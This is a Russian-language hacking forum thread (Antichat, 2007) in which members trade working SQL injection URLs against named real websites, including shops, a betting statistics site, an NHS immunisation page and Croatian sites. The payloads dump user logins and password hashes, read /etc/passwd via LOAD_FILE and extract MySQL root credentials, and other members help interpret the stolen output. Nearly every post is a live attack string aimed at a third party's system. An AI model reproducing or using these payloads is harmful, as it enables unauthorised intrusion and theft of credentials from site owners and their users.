ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1611  
Старый 04.04.2007, 13:12
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Код:
http://www.clabbergirl.com/store/store.php?mode=cat&cat_id=-3%20union%20select%201,user_Username,3,user_password,5%20from%20users/*
Шоп какой-то. Пароли открыты
____

И кстати, если вы задолбались убирать пробелы из скулей, просто нажмите на кнопку "цитировать".

Последний раз редактировалось kamaz; 04.04.2007 в 13:16.. Причина: Забыл поставить "/" :)
 
Ответить с цитированием

  #1612  
Старый 04.04.2007, 13:23
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

Цитата:
Пароли открыты
Цитата:
1$WEVsiCKUmcU
больше похоже на md5 unix
 
Ответить с цитированием

  #1613  
Старый 04.04.2007, 13:36
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Согласен, похоже, но на сколько я знаю, md5 unix состоит из 31 символа
 
Ответить с цитированием

  #1614  
Старый 04.04.2007, 13:57
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию

ну да, видно тут какая-то своя криптовка пасса...
 
Ответить с цитированием

  #1615  
Старый 04.04.2007, 14:08
Аватар для Woldemar
Woldemar
Познающий
Регистрация: 09.06.2005
Сообщений: 72
Провел на форуме:
348081

Репутация: 20
Отправить сообщение для Woldemar с помощью ICQ
По умолчанию

http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
137&sid=2007&stats=true&id=-1%20union%20select%
20LOAD_FILE(concat(char(47,101,116,99,47,112,97,11 5,
115,119,100))),2+limit+1/*

Помогите ка раскачать
 
Ответить с цитированием

  #1616  
Старый 04.04.2007, 14:35
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

Цитата:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
137&sid=2007&stats=true&id=-1%20union%20select%
20LOAD_FILE(concat(char(47,101,116,99,47,112,97,11 5,
115,119,100))),2+limit+1/*

Помогите ка раскачать
/etc/passwd
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764),2/*
MySQL root (видимо без пасса)
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+from+mysql.user/*

Последний раз редактировалось maxster; 04.04.2007 в 14:39..
 
Ответить с цитированием

  #1617  
Старый 04.04.2007, 14:53
Аватар для Woldemar
Woldemar
Познающий
Регистрация: 09.06.2005
Сообщений: 72
Провел на форуме:
348081

Репутация: 20
Отправить сообщение для Woldemar с помощью ICQ
По умолчанию

Цитата:
Сообщение от maxster  
/etc/passwd
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764),2/*
MySQL root (видимо без пасса)
Код:
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+from+mysql.user/*

Не понял etc/passwd а что дальше то. сорри
 
Ответить с цитированием

  #1618  
Старый 04.04.2007, 16:04
Аватар для Fr-Ron
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Еще один магазин. Таблица users, а выводит, по всей видимости, названия моделей =(

Цитата:
http://www.provideo.ru/index.php?action=list&page=1&category=-51+union+select+1,password+from+users+limit+0,1/*&f=c
 
Ответить с цитированием

  #1619  
Старый 04.04.2007, 16:06
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Одна из идеальных =)
Код:
http://www.immunisation.nhs.uk/article.php?id=9999999'+union+select+1,2,concat_ws(char(58),name,username,password),concat(version(),char(58),user()),5,6,7,8,9+from+user+limit+2,2/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1620  
Старый 04.04.2007, 16:32
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*
Код:
http://www.hnk.hr/hr/predstava.php?id=-18+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(concat(login,0x3a,password),0x71),0x71),10,11,12,13,14,15+from+users/*
Код:
http://www.gamer.hr/najave/swat4_ssynd.php?id=-210%20UNION%20SELECT%201,concat(email,0x3a,password),3,4,5,6,7,8,9+from+user+limit+3,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ